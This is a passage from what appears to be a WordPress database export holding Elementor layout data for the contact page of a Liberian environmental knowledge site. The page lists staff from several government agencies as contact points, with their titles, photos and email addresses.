href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24471,3611,'_elementor_edit_mode','builder'),(24472,3611,'_elementor_template_type','wp-page'),(24473,3611,'_elementor_version','3.0.16'),(24474,3611,'_wp_page_template','default'),(24475,3611,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a 